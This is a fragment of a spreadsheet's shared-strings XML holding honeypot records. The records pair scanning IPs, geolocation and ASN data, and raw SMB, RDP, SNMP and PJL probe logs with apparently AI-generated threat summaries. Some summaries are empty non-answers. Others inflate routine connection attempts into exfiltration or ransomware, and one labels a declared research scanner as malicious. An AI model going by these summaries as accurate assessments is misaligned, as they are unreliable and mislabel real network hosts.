(basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,22049)}</t>
  </si>
  <si>
    <t>::ffff:c9a6:ad74</t>
  </si>
  <si>
    <t>SMB Attack &amp;&amp; SMB Scanning</t>
  </si>
  <si>
    <t>0d7183292be88d7ab9e624a39f0ba083</t>
  </si>
  <si>
    <t>117.192.129.111</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:75c0:816f</t>
  </si>
  <si>
    <t>8e41c47c8886ff3f4140a6234ae1bd6e</t>
  </si>
  <si>
    <t>59.4.13.238</t>
  </si>
  <si>
    <t>{'korea.services.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>46</t>
  </si>
  <si>
    <t>Jeollanam-do</t>
  </si>
  <si>
    <t>Suncheon-si</t>
  </si>
  <si>
    <t>1835646</t>
  </si>
  <si>
    <t>540-130</t>
  </si>
  <si>
    <t>34.9506</t>
  </si>
  <si>
    <t>127.487</t>
  </si>
  <si>
    <t>KIXS-AS-KR</t>
  </si>
  <si>
    <t>Jeonnambonbujang</t>
  </si>
  <si>
    <t>::ffff:3b04:dee</t>
  </si>
  <si>
    <t>17057605f955de40b8a1b99849af927f</t>
  </si>
  <si>
    <t>160.19.18.59</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H24</t>
  </si>
  <si>
    <t>Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Prigen</t>
  </si>
  <si>
    <t>1630649</t>
  </si>
  <si>
    <t>-7.68333</t>
  </si>
  <si>
    <t>112.617</t>
  </si>
  <si>
    <t>149360</t>
  </si>
  <si>
    <t>PT Indo Telemedia Solusi</t>
  </si>
  <si>
    <t>PT. SMART COMPUTER SERVICE</t>
  </si>
  <si>
    <t>2023-12-29</t>
  </si>
  <si>
    <t>IDNIC-SMARTCOMP-ID</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (160.19.18.59,7424)}&amp;&amp;{Data_SMB:Incoming connection (160.19.18.59,4804)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:a013:123b</t>
  </si>
  <si>
    <t>An unknown entity is attempting to connect to a shared resource on the network, possibly for unauthorized access or file transfer. This could be an attempt to exploit vulnerabilities in the system's file sharing capabilities. The source IP address suggests an external threat. &amp;&amp; A malicious user from IP address 160.19.18.59 has made an incoming connection to a shared resource on SMB protocol. This could be an attempt to gain unauthorized access or exploit vulnerabilities in the system. The user is attempting to establish a connection with a potential attack vector. &amp;&amp; A user has successfully authenticated with a server using basic credentials, potentially indicating unauthorized access or attempted login from an unknown source. This could be a malicious actor attempting to gain access to sensitive resources. The use of basic authentication is also considered insecure in modern systems. &amp;&amp; Possible malicious activity detected: Unauthenticated user attempted to authenticate on an SMB share, suggesting a brute-force or unauthorized access attempt. This may indicate a vulnerability in authentication mechanisms or a targeted attack on the system's shared resources.</t>
  </si>
  <si>
    <t>SMB Attack &amp;&amp; Port Scan &amp;&amp; SMB Scanning &amp;&amp; SMB Scan &amp;&amp; SMB Brute &amp;&amp; SMB Brute &amp;&amp; SMB Login &amp;&amp; SMB Brute</t>
  </si>
  <si>
    <t>9f12b135ffcccb22895ece5f2831014a</t>
  </si>
  <si>
    <t>120.61.21.15</t>
  </si>
  <si>
    <t>::ffff:783d:150f</t>
  </si>
  <si>
    <t>3deadc04f0576d22e7d2ee6138c21d5c</t>
  </si>
  <si>
    <t>200.46.223.242</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;30102&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>Panama</t>
  </si>
  <si>
    <t>8</t>
  </si>
  <si>
    <t>Panamá</t>
  </si>
  <si>
    <t>Panamá District</t>
  </si>
  <si>
    <t>Panama City</t>
  </si>
  <si>
    <t>3703443</t>
  </si>
  <si>
    <t>07188</t>
  </si>
  <si>
    <t>8.99573</t>
  </si>
  <si>
    <t>-79.526</t>
  </si>
  <si>
    <t>21599</t>
  </si>
  <si>
    <t>Cable Onda</t>
  </si>
  <si>
    <t>Mercantile Shipstore</t>
  </si>
  <si>
    <t>::ffff:c82e:dff2</t>
  </si>
  <si>
    <t>No log data is provided for analysis. 
If data was present, I would have explained it here.</t>
  </si>
  <si>
    <t>bb19164be7a85b93684e699669ef1360</t>
  </si>
  <si>
    <t>120.61.241.156</t>
  </si>
  <si>
    <t>::ffff:783d:f19c</t>
  </si>
  <si>
    <t>a2eada75c60076216ea2f14fb100d444</t>
  </si>
  <si>
    <t>192.3.3.133</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;27102&amp;&amp;445&amp;&amp;52899&amp;&amp;50214&amp;&amp;NA</t>
  </si>
  <si>
    <t>Erie</t>
  </si>
  <si>
    <t>Buffalo</t>
  </si>
  <si>
    <t>5110629</t>
  </si>
  <si>
    <t>14205</t>
  </si>
  <si>
    <t>42.8864</t>
  </si>
  <si>
    <t>-78.8784</t>
  </si>
  <si>
    <t>36352</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,64723)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,64829)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,49633)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,49870)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,59740)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,58995)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,59034)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,49242)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,49288)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,60447)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,60561)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,59916)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,60133)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,63461)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,63528)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,63991)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,64277)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,61418)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,61580)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,61365)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,61411)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,62047)}</t>
  </si>
  <si>
    <t>::ffff:c003:385</t>
  </si>
  <si>
    <t>There is insufficient information to provide analysis as there is no log data provided. &amp;&amp; Malicious activity detected: An unknown device attempted to establish an unauthorized SMB connection from IP address 192.3.3.133 to port 62047. This may indicate a potential attempt at data exfiltration or system compromise. The attacker is trying to access shared resources on the system. &amp;&amp; An unknown computer is attempting to connect to the system over SMB protocol from an IP address that may be suspicious. This could be part of a ransomware or malware attack. Malicious actors often use such connections to spread malicious files. &amp;&amp; No data provided for analysis.</t>
  </si>
  <si>
    <t>ec89a7df884ebcc9f793d5c180e3ee44</t>
  </si>
  <si>
    <t>103.18.133.253</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;52707&amp;&amp;NA</t>
  </si>
  <si>
    <t>Kota Administrasi Jakarta Barat</t>
  </si>
  <si>
    <t>-6.19062</t>
  </si>
  <si>
    <t>106.765</t>
  </si>
  <si>
    <t>55693</t>
  </si>
  <si>
    <t>PT. Bangun Abadi Teknologi Indonesia</t>
  </si>
  <si>
    <t>Bangun Abadi Teknologi Indonesia</t>
  </si>
  <si>
    <t>::ffff:6712:85fd</t>
  </si>
  <si>
    <t>3b8f0455b1996cfc0bb60a1f6d4b6810</t>
  </si>
  <si>
    <t>90.58.19.254</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;5415&amp;&amp;NA</t>
  </si>
  <si>
    <t>IDF</t>
  </si>
  <si>
    <t>Île-de-France</t>
  </si>
  <si>
    <t>Paris</t>
  </si>
  <si>
    <t>2988507</t>
  </si>
  <si>
    <t>75000</t>
  </si>
  <si>
    <t>48.8566</t>
  </si>
  <si>
    <t>2.35222</t>
  </si>
  <si>
    <t>3215</t>
  </si>
  <si>
    <t>Orange S.A.</t>
  </si>
  <si>
    <t>Orange</t>
  </si>
  <si>
    <t>::ffff:5a3a:13fe</t>
  </si>
  <si>
    <t>No log data provided, cannot analyze.</t>
  </si>
  <si>
    <t>0b740ea9d69c7a2844ba38a8b302bf17</t>
  </si>
  <si>
    <t>219.79.198.231</t>
  </si>
  <si>
    <t>n219079198231.netvigator.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Causeway Bay</t>
  </si>
  <si>
    <t>1818428</t>
  </si>
  <si>
    <t>22.286</t>
  </si>
  <si>
    <t>114.191</t>
  </si>
  <si>
    <t>Hong Kong Telecommunications (HKT) Limited Mass Internet</t>
  </si>
  <si>
    <t>2003-07-07</t>
  </si>
  <si>
    <t>NETVIGATOR</t>
  </si>
  <si>
    <t>::ffff:db4f:c6e7</t>
  </si>
  <si>
    <t>05d5a16b3ad1ceec71a99a3c05f67a35</t>
  </si>
  <si>
    <t>203.240.224.138</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;39778&amp;&amp;NA</t>
  </si>
  <si>
    <t>Hanam-si</t>
  </si>
  <si>
    <t>Hanam (Sangil-ro 10-gil)</t>
  </si>
  <si>
    <t>1897007</t>
  </si>
  <si>
    <t>37.5506</t>
  </si>
  <si>
    <t>127.174</t>
  </si>
  <si>
    <t>4670</t>
  </si>
  <si>
    <t>Shinbiro</t>
  </si>
  <si>
    <t>Sejong Telecom</t>
  </si>
  <si>
    <t>::ffff:cbf0:e08a</t>
  </si>
  <si>
    <t>c3c4f49fe56704dfeb7ca447a1b9b07a</t>
  </si>
  <si>
    <t>104.244.87.232</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;31020&amp;&amp;23&amp;&amp;NA&amp;&amp;46110</t>
  </si>
  <si>
    <t>UT</t>
  </si>
  <si>
    <t>Utah</t>
  </si>
  <si>
    <t>Salt Lake</t>
  </si>
  <si>
    <t>Salt Lake City (Rio Grande)</t>
  </si>
  <si>
    <t>5780993</t>
  </si>
  <si>
    <t>84101</t>
  </si>
  <si>
    <t>40.7685</t>
  </si>
  <si>
    <t>-111.903</t>
  </si>
  <si>
    <t>13415</t>
  </si>
  <si>
    <t>FirstDigital Communications, LLC</t>
  </si>
  <si>
    <t>::ffff:68f4:57e8</t>
  </si>
  <si>
    <t>No log data provided to analyze.</t>
  </si>
  <si>
    <t>I don't see any log data provided. Please provide the log data, and I'll analyze it according to your requirements.</t>
  </si>
  <si>
    <t>8970b76862804b556774557e06059f3d</t>
  </si>
  <si>
    <t>117.217.44.241</t>
  </si>
  <si>
    <t>BB-Multiplay-General</t>
  </si>
  <si>
    <t>::ffff:75d9:2cf1</t>
  </si>
  <si>
    <t>16d33d4e54b23fd58080093bbeb2c28f</t>
  </si>
  <si>
    <t>205.210.31.171</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_POSTGRES_H25&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_ORACLE_H7&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_NTP_H29&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_IRC_H15&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_ORACLE_H31&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_NTP_H15&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_RDP_H32&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_SIP_H7&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_SOCKS5_H4&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_SNMP_H28&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_ORACLE_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;389&amp;&amp;5900&amp;&amp;5432&amp;&amp;110&amp;&amp;1433&amp;&amp;3389&amp;&amp;6379&amp;&amp;445&amp;&amp;161&amp;&amp;3306&amp;&amp;1521&amp;&amp;NA&amp;&amp;80&amp;&amp;1080&amp;&amp;6667&amp;&amp;56203&amp;&amp;9100&amp;&amp;23&amp;&amp;21&amp;&amp;50380&amp;&amp;53356&amp;&amp;53004&amp;&amp;443&amp;&amp;54155&amp;&amp;56998&amp;&amp;52877&amp;&amp;54172&amp;&amp;54909</t>
  </si>
  <si>
    <t>connection&amp;&amp;stshash&amp;&amp;query&amp;&amp;NA&amp;&amp;command&amp;&amp;GET&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TIknxEJFu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cvYNoa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GgKhoG'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pySnCorXV'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fPCiMg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OBZPsu'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CDDKwMGHS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nSpOTs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=khUukE'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,61640)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,61656)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,61672)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=rCWoySayD'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hdrlkD'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aOWLuA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mLYTlPcna'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=Aspxxr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jJktaO'}}&amp;&amp;{Data_HTTPS:{'Host': 'psilogistic.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yjpWQSjZN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KvzQWu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UKBPmUzcN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jpGeFc'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,63472)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,63474)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gBrAyvmuu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hEyTWq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tcvzPf'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YaDAcLEwb'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,60268)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,60282)}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1fab</t>
  </si>
  <si>
    <t>A suspicious incoming SMB connection has been detected from an IP address, indicating potential malicious access to shared resources or file systems from the internet. This could be a sign of unauthorized access attempts, such as spreading malware or stealing sensitive information. The source IP address 205.210.31.171 may be involved in this malicious activity. &amp;&amp; A potential SMB brute-force or unauthorized access attempt is being made from IP address 205.210.31.171. The attacker is attempting to connect to a shared resource on the targeted system. This could be an effort to exploit vulnerabilities in the system's file sharing capabilities. &amp;&amp; An incoming connection from an unknown IP address suggests a potential attempt to exploit a vulnerability or gain unauthorized access. This could be the beginning of a malicious interaction such as file sharing or exploitation of a service. The source IP 205.210.31.171 may indicate the origin of the suspicious activity. &amp;&amp; Unknown user attempted IMAP connection, possibly for unauthorized email access or scanning. This could indicate a reconnaissance attempt to gather information about the system's email services. The lack of further activity may suggest the attacker was detected or did not continue with malicious actions. &amp;&amp; No IMAP service activity detected, potentially indicating an unsuccessful login attempt or probing of the service. 
This could be a sign of reconnaissance by malicious actors checking for exposed services.
It may also indicate that no legitimate IMAP connection was made to this server. &amp;&amp; No log data provided, therefore no analysis can be done. &amp;&amp; No malicious activity detected for VNC service.
No attempt was made to access or interact with the VNC service, suggesting no malicious action took place. &amp;&amp; No log data provided, cannot analyze. &amp;&amp; An attacker is attempting to establish a secure connection (TLS) for FTP authentication, which could be a prelude to unauthorized file access or upload. This indicates an initial step in a potential malicious FTP session. The attacker may try to authenticate using stolen credentials. &amp;&amp; Malicious activity detected - an attacker is attempting to establish a secure connection for authentication using TLS encryption with FTP service, possibly trying to mask malicious actions as legitimate traffic. The attempt is likely a reconnaissance or a prelude to further exploitation. This may be part of a larger attack scenario.</t>
  </si>
  <si>
    <t>SMB Scan &amp;&amp; SMB Attack &amp;&amp; SMB Scanning &amp;&amp; TLS Auth &amp;&amp; FTP TLS Attack</t>
  </si>
  <si>
    <t>3e4af99a5777265eb7c457b062f96376</t>
  </si>
  <si>
    <t>205.210.31.232</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_SNMP_H30&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H12&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_NTP_H37&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MYSQL_H31&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_MYSQL_H37&amp;&amp;SMA-LAB_IRC_H14&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_NTP_H39&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_SNMP_H6&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_IRC_H28&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_PJL_H21&am